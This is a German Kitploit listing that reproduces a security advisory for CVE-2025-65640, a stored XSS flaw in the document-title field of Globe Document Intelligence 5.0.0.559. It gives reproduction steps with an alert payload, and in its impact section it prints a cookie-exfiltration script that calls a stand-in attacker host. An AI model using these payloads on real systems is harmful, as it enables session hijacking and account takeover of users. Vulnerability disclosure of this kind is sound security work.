Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-65640 — Öffentlicher Sicherheitshinweis für CVE-2025-65640: Stored-XSS-Schwachstelle in Globe Document Intelligence. | Kitploit
Tools/GitHubGitHub/vincenzo-emanuele/cve-2025-65640
SchwachstellenanalyseWebanwendungs-ExploitationWebsicherheitPenetrationstestsPapers & ForschungLernen & Bildung
GitHubvincenzo-emanuele/cve-2025-65640

CVE-2025-65640

Öffentlicher Sicherheitshinweis für CVE-2025-65640: Stored-XSS-Schwachstelle in Globe Document Intelligence.

Repository anzeigen
101vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-65640

1. Informationen zur Schwachstelle

  • CVE-ID: CVE-2025-65640 (Derzeit RESERVIERT)
  • Schwachstellentyp: Stored Cross-Site Scripting (XSS)
  • CVSSv3-Score: 6.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)
  • Hersteller: Arket/Bluenext S.r.l.
  • Produkt: Globe Document Intelligence
  • Betroffene Version: 5.0.0.559
  • Entdecker: Vincenzo Emanuele Martone

2. Beschreibung

Eine Stored-Cross-Site-Scripting-Schwachstelle (XSS) wurde in der Globe Document Intelligence-Plattform (Version 5.0.0.559) identifiziert. Die Anwendung bereinigt oder kodiert benutzereingegebene Daten in der Eigenschaft "Title" eines neu erstellten Dokuments nicht ordnungsgemäß. Wenn ein authentifizierter Benutzer zu den Übersichtsseiten (z. B. "Task in progress / Recent") navigiert, wird die schädliche Nutzlast im Kontext des Browsers des Opfers reflektiert und ausgeführt.

3. Auswirkungen

Diese Schwachstelle ermöglicht es einem authentifizierten Angreifer, bösartigen JavaScript-Code auf dem Server zu speichern. Wenn andere authentifizierte Benutzer (einschließlich Administratorkonten) die betroffenen Seiten aufrufen, wird das Skript automatisch ausgeführt. Während der unten aufgeführte Proof of Concept die Schwachstelle mithilfe eines harmlosen alert() demonstriert, kann ein Angreifer diesen Fehler ausnutzen, um eine Session-Hijacking- und Account-Übernahme zu erreichen. Zum Beispiel würde das Injizieren einer Nutzlast wie die Session-Cookies des Opfers stillschweigend an einen vom Angreifer kontrollierten externen Server exfiltrieren.

<script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script>

4. Schritte zur Reproduktion (Proof of Concept)

Um die Schwachstelle zu reproduzieren, kann ein authentifizierter Angreifer die folgenden Schritte ausführen:

  1. Navigieren Sie zum Bereich zur Dokumenterstellung ("Nuovo documento") und füllen Sie die Pflichtfelder mit beliebigen Daten aus, um erfolgreich ein neues Dokument zu erstellen.
  2. Senden Sie das Formular ab und erstellen Sie das Dokument.
  3. Wählen Sie das neu erstellte Dokument aus, öffnen Sie das Kontextmenü (Rechtsklick -> Dokumenteigenschaften) und suchen Sie das Feld "Title".
  4. Injizieren Sie die folgende einfache XSS-Nutzlast in das Feld "Title": <script>alert("XSS")</script>
  5. Speichern Sie die Änderungen. Die schädliche Nutzlast ist nun dauerhaft in der Datenbank gespeichert.
  6. Navigieren Sie zur Seite "Task in progress / Recent" (Task in attesa/Recenti).
  7. Da die Seite den Dokumenttitel ohne ordnungsgemäße Ausgabekodierung rendert, wird die JavaScript-Nutzlast ausgeführt und der Alert ausgelöst.

5. Empfohlene Gegenmaßnahmen

Laut Hersteller wurde diese Schwachstelle in Version 5.1.0.575 behoben. Um dieses Problem zu beheben, wird empfohlen, die Globe Document Intelligence-Plattform auf Version 5.1.0.575 zu aktualisieren.


Haftungsausschluss

Dieser Proof of Concept (PoC) wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Die in diesem Dokument beschriebenen Informationen und Codes dürfen nicht für böswillige Aktivitäten oder gegen Systeme ohne ausdrückliche vorherige Genehmigung der Systemeigentümer verwendet werden. Der Autor übernimmt keinerlei Haftung und ist nicht verantwortlich für Missbrauch oder Schäden, die durch die Anwendung des bereitgestellten Materials verursacht werden.

Tool herunterladen